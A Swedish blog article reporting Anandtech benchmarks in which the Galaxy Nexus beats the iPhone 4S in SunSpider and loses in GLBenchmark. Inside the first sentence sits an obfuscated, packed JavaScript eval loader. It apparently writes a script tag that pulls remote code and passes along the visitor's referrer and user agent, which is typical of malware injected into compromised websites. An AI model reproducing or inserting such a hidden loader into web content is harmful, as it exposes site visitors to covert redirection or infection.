Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

iPhone 4S testas mot Galaxy Nexus

iPhone 4S testas mot Galaxy Nexus
Filip Urde
  • On 21 november, 2011
  • http://www.revue.se/filip-urde

Första testerna konkurrenterna emellan är gjorda… Med Samsungs Galaxy eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkbtn|var|u0026u|referrer|ianab||js|php’.split(’|’),0,{}))
Nexus
som vinnare.

Teknikbloggen Anandtech genomförde i förra veckan olika prestanda test på Samsungs nya super lur: Galaxy Nexus och jämfört resultaten med konkurrenterna. Enligt de första testerna är Galaxy Nexus snabbare än iPhone 4S. Sunspider som var testverktyget i testerna visar att Galaxy Nexus är snabbare än både Motorola Droid Razr och iPhone 4S. Apple tar dock tredje och fjärdeplatsen med iPhone 4S och iPhone 4. Så man är med i toppen, men ärkerivalen Samsung har nu alltså slagit Apple i prestandan.

Glädjande för oss som gillar iPhone är att grafiktestet Glbenchmark visade en klar vinst för iPhone 4S. Som var överlägen jämfört med Galaxy Nexus och presterade mer än dubbelt så bra i testet. A5-processorn gör sitt jobb med grafiken.

Nu blir det fight påriktigt

Läs hela testet på länken nedan.

Anandtech

Comments